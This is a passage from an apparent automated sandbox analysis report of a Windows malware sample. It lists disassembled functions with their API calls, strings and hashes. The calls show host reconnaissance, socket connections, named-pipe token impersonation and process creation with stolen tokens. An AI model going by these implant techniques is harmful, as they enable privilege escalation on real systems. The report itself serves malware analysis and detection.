                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • _memset.LIBCMT ref: 00DBC3F3
                              • Part of subcall function 00DBEA37: _malloc.LIBCMT ref: 00DBEA5E
                              • Part of subcall function 00DBEA37: _memset.LIBCMT ref: 00DBEA8C
                            • htonl.WS2_32(00000000), ref: 00DBC424
                            • GetComputerNameExA.KERNEL32(00000006,?,?), ref: 00DBC495
                            • GetComputerNameA.KERNEL32(?,?), ref: 00DBC4C6
                            • GetUserNameA.ADVAPI32(?,?), ref: 00DBC4F7
                              • Part of subcall function 00DB2F1B: WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 00DB2F3F
                            • _malloc.LIBCMT ref: 00DBC5CF
                            • _memset.LIBCMT ref: 00DBC661
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc_memset$Name$Computer$AllocateHeapSocketUserhtonl
                            • String ID:
                            • API String ID: 932012179-0
                            • Opcode ID: a280516bcf2bcbc31588620091ca1e63c8c3124e7ee7d4ddb44343df5665b45f
                            • Instruction ID: 4301775c920e298e48b9857651d8d66dfffa4574e2925b81a5194ddd3f771f34
                            • Opcode Fuzzy Hash: a280516bcf2bcbc31588620091ca1e63c8c3124e7ee7d4ddb44343df5665b45f
                            • Instruction Fuzzy Hash: 4D812772914300EAC320EB659C46FEB77ECFF84720F11581EF58697282DA74DA0487B2
                            Function 00DB8748 Relevance: 13.6, APIs: 9, Instructions: 101networkCOMMON
                            Download Yara Rule
                            APIs
                            • htonl.WS2_32 ref: 00DB8767
                            • htons.WS2_32(00000000), ref: 00DB8778
                            • socket.WS2_32(00000002,00000001,00000000), ref: 00DB87B1
                            • closesocket.WS2_32(00000000), ref: 00DB87C0
                            • gethostbyname.WS2_32(00000000), ref: 00DB87DE
                            • htons.WS2_32(?), ref: 00DB880A
                            • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00DB881D
                            • connect.WS2_32(00000000,?,00000010), ref: 00DB882E
                            • WSAGetLastError.WS2_32(00000000,?,00000010), ref: 00DB8837
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                            • String ID:
                            • API String ID: 3339321253-0
                            • Opcode ID: 74113555802c83711b6376bb1dcc34fb945eae4fab666351e9c2289d6092bec3
                            • Instruction ID: 05230b26a30b47591ceb598f4a5ab89aa9adc236c7223a7d1f13a6a07a3f8603
                            • Opcode Fuzzy Hash: 74113555802c83711b6376bb1dcc34fb945eae4fab666351e9c2289d6092bec3
                            • Instruction Fuzzy Hash: 673108B6D00158EBDB20ABE59C85EFEB7ACEF08314F1401A6F945E7241FA348905D779
                            Function 00DB4B7A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 130processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                            • _memset.LIBCMT ref: 00DB4BDD
                            • GetStartupInfoA.KERNEL32(?), ref: 00DB4BF5
                              • Part of subcall function 00DB31C8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,00DB4ACB,?,00DB48E4,00DB4ACB,?,00000400), ref: 00DB31DE
                              • Part of subcall function 00DB31C8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00DB4ACB,00DB48E4,?,00DB48E4,00DB4ACB,?,00000400,?,?,?,?,00DB4ACB), ref: 00DB31F7
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DB4C5A
                            • GetCurrentDirectoryW.KERNEL32(00000400,?), ref: 00DB4C64
                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000001,00000000,00000000,00000000,00000000,00000000,?,00DB32CF), ref: 00DB4C8F
                            • GetLastError.KERNEL32 ref: 00DB4C9E
                              • Part of subcall function 00DB26E2: _vswprintf_s.LIBCMT ref: 00DB26FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCurrentDirectoryMultiWide_malloc$CreateErrorInfoLastLogonProcessStartupWith_memset_vswprintf_s
                            • String ID: %s as %s\%s: %d
                            • API String ID: 963358868-816037529
                            • Opcode ID: 3338687d53188791e4c145ffb19e238e297102b4ad604cf31be59687cd3ef16c
                            • Instruction ID: a3b4c1fca304884cd97fce5b0d836c5f3b7b681356d920752c3091cc7269ca03
                            • Opcode Fuzzy Hash: 3338687d53188791e4c145ffb19e238e297102b4ad604cf31be59687cd3ef16c
                            • Instruction Fuzzy Hash: E3413471D00209BADF01AFA9DC85EEFBFB9EF89750F10401AF605A6261DB718A10DB71
                            Function 00401C80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124filememoryCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: Virtual$ErrorLastProtectQueryabortfwritevfprintf
                            • String ID: @
                            • API String ID: 1616349570-2766056989
                            • Opcode ID: 1b0efd051e5881cbe3a5a53f7e2a4386ccc2b94af93b62ca0e5c5b9780880a0d
                            • Instruction ID: 2f91aa6c44690fe53a7d4d9a4cebfbeb7542b51ecc99335da346757be2dbd23f
                            • Opcode Fuzzy Hash: 1b0efd051e5881cbe3a5a53f7e2a4386ccc2b94af93b62ca0e5c5b9780880a0d
                            • Instruction Fuzzy Hash: 2D415EB59043019FD700EF29D98565AFBE0FF84354F45893EE888973A1D778E844CB9A
                            Function 00DBDF65 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DBDF89
                            • _memset.LIBCMT ref: 00DBDF97
                            • _memset.LIBCMT ref: 00DBDFA5
                            • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00001000,?), ref: 00DBDFC2
                            • LookupAccountSidA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00DBDFF1
                            • __snprintf.LIBCMT ref: 00DBE013
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$AccountInformationLookupToken__snprintf
                            • String ID: %s\%s
                            • API String ID: 2009363630-4073750446
                            • Opcode ID: 1de0312eb1a0e60c3ed76667eb5490b93d98f6b5dfee4b72b6ef86c78a0ad65d
                            • Instruction ID: 3c0dc6ac0b462fdb472b5f719a91a976ce1efe9e8c175436d3644a01148023e9
                            • Opcode Fuzzy Hash: 1de0312eb1a0e60c3ed76667eb5490b93d98f6b5dfee4b72b6ef86c78a0ad65d
                            • Instruction Fuzzy Hash: 1F2100B290111DBADB11DA90DC85FEF77BCEF48744F0445BAB616E2101E670EB848B74
                            Function 00D71D62 Relevance: 12.2, APIs: 8, Instructions: 196COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf$_memset
                            • String ID:
                            • API String ID: 444161222-0
                            • Opcode ID: 2da3511d33a5d9c64791134d8e0135a70be9b0f43036398cb03b1249db1be582
                            • Instruction ID: b16eba3124d1759d63f3478a319e23a87be059dc00a638576bb91bbc98c3c6a3
                            • Opcode Fuzzy Hash: 2da3511d33a5d9c64791134d8e0135a70be9b0f43036398cb03b1249db1be582
                            • Instruction Fuzzy Hash: 2D61C572800129AFDB11EBA4CC85EFE77BDEF05300F1441A5F949A7122E7359E498B75
                            Function 00402110 Relevance: 12.1, APIs: 8, Instructions: 90COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: signal
                            • String ID:
                            • API String ID: 1946981877-0
                            • Opcode ID: e5ac87d4f014395d303e68e2d1d9b879cf4345e1fd894e7c545168dfae24a9c2
                            • Instruction ID: b56ee3113ec50b52d2ebb4f8ab71ee7f336b0eefb9bc163dcadcfca50a5a4408
                            • Opcode Fuzzy Hash: e5ac87d4f014395d303e68e2d1d9b879cf4345e1fd894e7c545168dfae24a9c2
                            • Instruction Fuzzy Hash: 153121B01046008AE7206FA6864C32F76D0AB45328F154B6FE9E4EB3D1CBFDC985971B
                            Function 00DB4112 Relevance: 12.1, APIs: 8, Instructions: 58pipethreadfileCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DB412F
                            • GetLastError.KERNEL32 ref: 00DB4142
                            • ConnectNamedPipe.KERNEL32(00000000), ref: 00DB4156
                            • ReadFile.KERNEL32(?,00000001,?,00000000), ref: 00DB4170
                            • ImpersonateNamedPipeClient.ADVAPI32 ref: 00DB4180
                            • GetCurrentThread.KERNEL32 ref: 00DB4195
                            • OpenThreadToken.ADVAPI32(00000000), ref: 00DB419C
                            • DisconnectNamedPipe.KERNEL32(?), ref: 00DB41B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken_memset
                            • String ID:
                            • API String ID: 3867162830-0
                            • Opcode ID: 7ac0bb848ff8242492bbf9dfabf66e63852f299c8cd1f5bd47bb61822328bc16
                            • Instruction ID: 4b5303286dd64bd385b8a34699749d68763600282d5cbec9c467a9649f6611cd
                            • Opcode Fuzzy Hash: 7ac0bb848ff8242492bbf9dfabf66e63852f299c8cd1f5bd47bb61822328bc16
                            • Instruction Fuzzy Hash: 9D117031A41359EFDB10AF64ED85AAA3BBCEB14799F044022F606D6263DB30CD449B70
                            Function 00DC989C Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                            • String ID:
                            • API String ID: 3886058894-0
                            • Opcode ID: 73bb71f67bf0becb2f1dd24f7f3995b2945a0b1f834a48f7059707b9a443755c
                            • Instruction ID: d84dfc90c452ef7fae1514e5acde8fc1bd2e5a4dc1c3ac389da0d5ada4145a68
                            • Opcode Fuzzy Hash: 73bb71f67bf0becb2f1dd24f7f3995b2945a0b1f834a48f7059707b9a443755c
                            • Instruction Fuzzy Hash: 17518131900606EBCB209F698858F9EFBB5EF81320F28862DF86597191E7309A51DF71
                            Function 00D88C9C Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                            • String ID:
                            • API String ID: 3886058894-0
                            • Opcode ID: be45696a32e206cab89c2fccae979ac639060203ce16becbc01005babec9e347
                            • Instruction ID: a5bff3958b78e37c8e9b0e4c81c0a9fc464120609c3a741f81e4664672bfb177
                            • Opcode Fuzzy Hash: be45696a32e206cab89c2fccae979ac639060203ce16becbc01005babec9e347
                            • Instruction Fuzzy Hash: 4B51D231A01205EFCF21BF69884499FBBB5EF50320F688629F865921D1EB719E50EF70
                            Function 00DB6072 Relevance: 10.7, APIs: 7, Instructions: 184COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$_malloc$_rand
                            • String ID:
                            • API String ID: 2453798774-0
                            • Opcode ID: ddbd3a025a0aec4532e33c5aeeeb488dbb3b77c694aae14c4e3775a50cde72ac
                            • Instruction ID: 48f1638fba5cd8126a5620e3ed3a3dea5bc71901ee1a20f26c32138a44974cba
                            • Opcode Fuzzy Hash: ddbd3a025a0aec4532e33c5aeeeb488dbb3b77c694aae14c4e3775a50cde72ac
                            • Instruction Fuzzy Hash: AC510571A00206EFDB019F78DC55FEE7BA9DF56340F184059F885A7252EA34DE0587B4
                            Function 00DB6072 Relevance: 10.7, APIs: 7, Instructions: 184COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$_malloc$_rand
                            • String ID:
                            • API String ID: 2453798774-0
                            • Opcode ID: 6ef6dc6e4bcd2de23ed2e467e773a6f8dc8f9ebbd22941a16d6cb0498434510d
                            • Instruction ID: 48f1638fba5cd8126a5620e3ed3a3dea5bc71901ee1a20f26c32138a44974cba
                            • Opcode Fuzzy Hash: 6ef6dc6e4bcd2de23ed2e467e773a6f8dc8f9ebbd22941a16d6cb0498434510d
                            • Instruction Fuzzy Hash: AC510571A00206EFDB019F78DC55FEE7BA9DF56340F184059F885A7252EA34DE0587B4
                            Function 00DB4870 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 184processCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DB489E
                            • _memset.LIBCMT ref: 00DB48BA
                            • CreateProcessWithTokenW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,?,C3E8296A,83FFFFDB), ref: 00DB4946
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$CreateProcessTokenWith
                            • String ID: sysnative$system32
                            • API String ID: 355399865-2461298002
                            • Opcode ID: a560f8e5821ace479ef37426065189df40f2b418246d9fcabc41abe21ba2d823
                            • Instruction ID: 098e20b5ccb69cc2b6a406492823cce3200a500d3df74ee8084aff5b8ff6f814
                            • Opcode Fuzzy Hash: a560f8e5821ace479ef37426065189df40f2b418246d9fcabc41abe21ba2d823
                            • Instruction Fuzzy Hash: E951D372604345EFD721EF64DC85EEB77E9EF85314F14082AE58AC7212EA31D9088B75
                            Function 00D75472 Relevance: 10.7, APIs: 7, Instructions: 184COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$_malloc$_rand
                            • String ID:
                            • API String ID: 2453798774-0
                            • Opcode ID: 75c1d89bc45a6c8dcb5618c688f5539780bfa6badbf1ba624bde91fa96b31e63
                            • Instruction ID: 513a486bd70f2b1d451d8c1a38fe9fc064ac70ac17782564ff7c56bab81d88ca
                            • Opcode Fuzzy Hash: 75c1d89bc45a6c8dcb5618c688f5539780bfa6badbf1ba624bde91fa96b31e63
                            • Instruction Fuzzy Hash: 7A513930A00505AFDB01AFB89C45BEE7BA9DF16300F188094F884AB256EA70DE05CB74
                            Function 00DB79AC Relevance: 10.6, APIs: 7, Instructions: 94pipesleepfileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00100000,00000000), ref: 00DB79DF
                            • GetLastError.KERNEL32 ref: 00DB79EC
                            • WaitNamedPipeA.KERNEL32(?,00002710), ref: 00DB7A01
                            • Sleep.KERNEL32(000003E8), ref: 00DB7A0E
                            • SetNamedPipeHandleState.KERNEL32(?,?,00000000,00000000), ref: 00DB7A58
                            • GetLastError.KERNEL32 ref: 00DB7A62
                            • DisconnectNamedPipe.KERNEL32(?), ref: 00DB7A9C
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleSleepStateWait
                            • String ID:
                            • API String ID: 3284586969-0
                            • Opcode ID: e8d41e175776ac855918c3e71b9abf45a6f7486e17e9dc2388c0ed026aa108f1
                            • Instruction ID: a2a5aab4758796897123a698e6082dd1bf037c42d6964077f211c45f32ba0aad
                            • Opcode Fuzzy Hash: e8d41e175776ac855918c3e71b9abf45a6f7486e17e9dc2388c0ed026aa108f1
                            • Instruction Fuzzy Hash: A021B531608309EBEB516BB49C86BFE379DAB85724F210427F61BE61D1EB605A404671
                            Function 00DBE65A Relevance: 10.6, APIs: 7, Instructions: 81COMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32 ref: 00DBE68B
                            • OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 00DBE6A9
                            • GetLastError.KERNEL32 ref: 00DBE6B3
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$OpenProcessToken
                            • String ID:
                            • API String ID: 2009710997-0
                            • Opcode ID: 6fbe1575a54590432f7ee40c603fd5158cfa334ee633d133c71ad9e7b45f224a
                            • Instruction ID: 34c7e974e89abebbf36e65a4a102aac7107a495200368bd2e52ff0d36858832b
                            • Opcode Fuzzy Hash: 6fbe1575a54590432f7ee40c603fd5158cfa334ee633d133c71ad9e7b45f224a
                            • Instruction Fuzzy Hash: C5218E72A50309FBEB102BE0DC4EFFE776DEB14759F180029B606D6190EB748D0096B1
                            Function 00DB5FB6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DB5FC6
                            • _memset.LIBCMT ref: 00DB5FD2
                              • Part of subcall function 00DB6072: _malloc.LIBCMT ref: 00DB60C4
                              • Part of subcall function 00DB6072: _malloc.LIBCMT ref: 00DB60CF
                              • Part of subcall function 00DB6072: _memset.LIBCMT ref: 00DB60DB
                              • Part of subcall function 00DB6072: _memset.LIBCMT ref: 00DB60E6
                              • Part of subcall function 00DB6072: _rand.LIBCMT ref: 00DB6144
                            • __snprintf.LIBCMT ref: 00DB602E
                            • _memset.LIBCMT ref: 00DB604C
                            • _memset.LIBCMT ref: 00DB6057
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$_malloc$__snprintf_rand
                            • String ID: %s%s
                            • API String ID: 4266533377-3438391663
                            • Opcode ID: 840eae8e12f3875ca93af06726ae2f410766420f8e9aef90cd287846aa97c82c
                            • Instruction ID: b454588293460d174e4f099a11e37bc4bcd66561a1746f94851ce9b50736d319
                            • Opcode Fuzzy Hash: 840eae8e12f3875ca93af06726ae2f410766420f8e9aef90cd287846aa97c82c
                            • Instruction Fuzzy Hash: DD21AE31900100BBCF25AE15DC46F9F3B75EF95710F244085FD016B256E675EE21CAB1
                            Function 00DB5FB6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DB5FC6
                            • _memset.LIBCMT ref: 00DB5FD2
                              • Part of subcall function 00DB6072: _malloc.LIBCMT ref: 00DB60C4
                              • Part of subcall function 00DB6072: _malloc.LIBCMT ref: 00DB60CF
                              • Part of subcall function 00DB6072: _memset.LIBCMT ref: 00DB60DB
                              • Part of subcall function 00DB6072: _memset.LIBCMT ref: 00DB60E6
                              • Part of subcall function 00DB6072: _rand.LIBCMT ref: 00DB6144
                            • __snprintf.LIBCMT ref: 00DB602E
                            • _memset.LIBCMT ref: 00DB604C
                            • _memset.LIBCMT ref: 00DB6057
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$_malloc$__snprintf_rand
                            • String ID: %s%s
                            • API String ID: 4266533377-3438391663
                            • Opcode ID: d53b5cc60179d2f652661f9f5a6de1474bcf4f2c63c9259dd3fe06b4a266d57e
                            • Instruction ID: b454588293460d174e4f099a11e37bc4bcd66561a1746f94851ce9b50736d319
                            • Opcode Fuzzy Hash: d53b5cc60179d2f652661f9f5a6de1474bcf4f2c63c9259dd3fe06b4a266d57e
                            • Instruction Fuzzy Hash: DD21AE31900100BBCF25AE15DC46F9F3B75EF95710F244085FD016B256E675EE21CAB1
                            Function 00DB7C49 Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB7C57
                            • ioctlsocket.WS2_32(?,8004667E,?), ref: 00DB7C7B
                            • GetTickCount.KERNEL32 ref: 00DB7CB2
                            • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00DB7CD7
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountTickioctlsocket
                            • String ID:
                            • API String ID: 3686034022-0
                            • Opcode ID: 37490001e58b4895959c8f2fc0511d7968f5e7eeccef77e4e254016b041475c8
                            • Instruction ID: bac6c89a52cb10e2f868b4cacc9cd6ee8ac9a65073feb511b7528ff2c0c0a44e
                            • Opcode Fuzzy Hash: 37490001e58b4895959c8f2fc0511d7968f5e7eeccef77e4e254016b041475c8
                            • Instruction Fuzzy Hash: C0119131514209FBDB008FA1DC44BEC7FA8EB80379F11801AF516D6290D7B4D9848BB5
                            Function 00DB4112 Relevance: 10.6, APIs: 7, Instructions: 58pipethreadfileCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DB412F
                            • GetLastError.KERNEL32 ref: 00DB4142
                            • ReadFile.KERNEL32(?,00000001,?,00000000), ref: 00DB4170
                            • ImpersonateNamedPipeClient.ADVAPI32 ref: 00DB4180
                            • GetCurrentThread.KERNEL32 ref: 00DB4195
                            • OpenThreadToken.ADVAPI32(00000000), ref: 00DB419C
                            • DisconnectNamedPipe.KERNEL32(00DE6024), ref: 00DB41B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: NamedPipeThread$ClientCurrentDisconnectErrorFileImpersonateLastOpenReadToken_memset
                            • String ID:
                            • API String ID: 1184232734-0
                            • Opcode ID: 680c7e651cc8fd6ea3a1ac9cce9a0873b90cd3151b74d8effa42d0db4e61c554
                            • Instruction ID: 4b5303286dd64bd385b8a34699749d68763600282d5cbec9c467a9649f6611cd
                            • Opcode Fuzzy Hash: 680c7e651cc8fd6ea3a1ac9cce9a0873b90cd3151b74d8effa42d0db4e61c554
                            • Instruction Fuzzy Hash: 9D117031A41359EFDB10AF64ED85AAA3BBCEB14799F044022F606D6263DB30CD449B70
                            Function 00DBEC6F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00DBEC76
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • _malloc.LIBCMT ref: 00DBEC83
                            • _malloc.LIBCMT ref: 00DBEC9E
                            • __snprintf.LIBCMT ref: 00DBECB1
                            • _malloc.LIBCMT ref: 00DBECD0
                            Strings
                            • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 00DBECA4
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$AllocateHeap__snprintf
                            • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                            • API String ID: 3929630252-2739389480
                            • Opcode ID: 409e92a814367b8a44f2dd3cf8f0d5ff9fba6d53ced56c44a2b28af9f2822140
                            • Instruction ID: 051b612018fe3267caa4b3f4cc85ef2a6e6693f8a0591b3780b8db4d887ed6de
                            • Opcode Fuzzy Hash: 409e92a814367b8a44f2dd3cf8f0d5ff9fba6d53ced56c44a2b28af9f2822140
